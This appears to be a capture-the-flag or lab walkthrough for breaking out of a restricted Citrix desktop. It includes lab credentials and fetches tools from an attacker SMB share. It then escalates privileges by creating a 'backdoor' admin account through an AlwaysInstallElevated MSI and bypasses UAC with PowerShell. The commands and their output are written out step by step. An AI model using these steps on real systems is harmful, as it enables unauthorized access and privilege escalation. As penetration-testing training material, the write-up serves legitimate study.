Citrix Breakout
Citrix Environment Setup
Connect to Citrix via RDP
mrci0x1@htb$ rdesktop humongousretail.comUsername:
pmorganPassword:
Summer1Summer!Domain:
htb.local
After login, open launch.ica file to connect to Citrix Desktop.
Bypassing Path Restrictions with Dialog Boxes
Use Paint Dialog Box
\\127.0.0.1\c$\users\pmorganList of files displayed inside the restricted directory
Accessing SMB Shares
Start SMB Server (Attacker Machine)
mrci0x1@htb$ smbserver.py -smb2support share $(pwd)Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsedAccess SMB Share from Citrix
\\10.13.38.95\shareList of files from the share displayed inside file dialog
Execute File from SMB Share
Right-click on pwn.exe → Open
cmd.exe window launched inside Citrix environment
Sample pwn.c Code
#include <stdlib.h>
int main() {
system("C:\\Windows\\System32\\cmd.exe");
return 0;
}Copy File from SMB Share
C:\mrci0x1> copy \\10.13.38.95\share\Bypass-UAC.ps1 C:\Users\pmorgan\Desktop 1 file(s) copied.
Using Alternative Explorers
Copy Explorer++ from SMB Share
C:\mrci0x1> copy \\10.13.38.95\share\Explorer++.exe C:\Users\pmorgan\Desktop 1 file(s) copied.Run Explorer++
C:\mrci0x1> C:\Users\pmorgan\Desktop\Explorer++.exeExplorer++ window opened allowing full unrestricted file browsingUsing Alternative Registry Editors
Copy SmallRegistryEditor from SMB Share
C:\mrci0x1> copy \\10.13.38.95\share\SmallRegistryEditor.exe C:\Users\pmorgan\Desktop1 file(s) copied.Run SmallRegistryEditor
C:\mrci0x1> C:\Users\pmorgan\Desktop\SmallRegistryEditor.exeRegistry editor window opened with full access to registry hivesModifying Shortcut Files
Modify Existing Shortcut
Right-click any
.lnkfile → PropertiesChange target to:
C:\Windows\System32\cmd.exe
Create New Shortcut via PowerShell
PS C:\mrci0x1> $WShell = New-Object -ComObject WScript.Shell
PS C:\mrci0x1> $Shortcut = $WShell.CreateShortcut("C:\Users\pmorgan\Desktop\evil.lnk")
PS C:\mrci0x1> $Shortcut.TargetPath = "C:\Windows\System32\cmd.exe"
PS C:\mrci0x1> $Shortcut.Save()New shortcut created: evil.lnkScript Execution (Batch File)
Create evil.bat File
Content:
cmd
Run evil.bat
C:\mrci0x1> C:\Users\pmorgan\Desktop\evil.batcmd.exe window openedEscalating Privileges with AlwaysInstallElevated
Check Registry Key - HKCU
C:\mrci0x1> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedHKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1Check Registry Key - HKLM
C:\mrci0x1> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedHKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1Generate Malicious MSI with PowerUp
PS C:\mrci0x1> Import-Module .\PowerUp.ps1
PS C:\mrci0x1> Write-UserAddMSIOutput Path
-----------
UserAdd.msiExecute UserAdd.msi
C:\mrci0x1> msiexec /i C:\Users\pmorgan\Desktop\UserAdd.msi
Run as New Admin User
C:\mrci0x1> runas /user:backdoor cmdEnter the password for backdoor:
Attempting to start cmd as user "VDESKTOP3\backdoor" ...Bypassing UAC
Set Execution Policy
PS C:\mrci0x1> Set-ExecutionPolicy Unrestricted -Scope ProcessExecution Policy set successfullyImport and Run Bypass-UAC
PS C:\mrci0x1> Import-Module .\Bypass-UAC.ps1
PS C:\mrci0x1> Bypass-UAC -Method UacMethodSysprep[*] UAC Bypass triggered successfully.
[*] Elevated PowerShell window opened.
Last updated